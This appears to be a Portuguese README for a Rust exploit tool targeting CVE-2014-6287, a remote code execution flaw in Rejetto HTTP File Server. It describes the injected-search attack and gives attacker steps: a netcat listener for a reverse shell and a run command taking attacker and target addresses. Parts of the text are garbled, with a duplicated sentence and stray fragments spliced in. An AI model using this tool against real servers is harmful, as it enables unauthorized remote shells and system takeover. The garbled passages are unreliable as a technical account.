
Uma implementação em Rust do exploit CVE-2014-6287 direcionado às versões 2.3x anteriores à 2.3c do Rejetto HTTP File Server (HFS).
Uma implementação em Rust da exploração da CVE-2014-6287 voltada para o Rejetto HTTP File Server (HFS) versões 2.3x anteriores à 2.3c.
CVE-2014-6287 é uma vulnerabilidade crítica de execução remota de código no Rejetto HTTP File Server (HFS).
A função findMacroMarker em no Rejetto HTTP File Server permite que atacantes remotos executem programas arbitrários por meio de uma sequência em uma ação de pesquisa. Essa vulnerabilidade possibilita que atacantes contornem a validação de entrada e injetem código malicioso que é executado no sistema alvo.
parserLib.pas%00A exploração funciona da seguinte forma:
%00){. e .}Antes de executar a exploração, configure um listener na sua máquina atacante para capturar o shell reverso:
# Substitua <LPORT> pela porta de escuta desejada
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: Seu endereço IP local (máquina atacante)-p, --lport <LPORT>: Sua porta local para o shell reverso-r, --rhost <RHOST>: Endereço IP do alvo (servidor HFS vulnerável)-t, --rport <RPORT>: Porta do alvo (padrão: 80)Esta ferramenta destina-se apenas a fins educacionais e de testes de penetração autorizados. Use com responsabilidade e somente em sistemas que você possui ou para os quais tenha permissão explícita.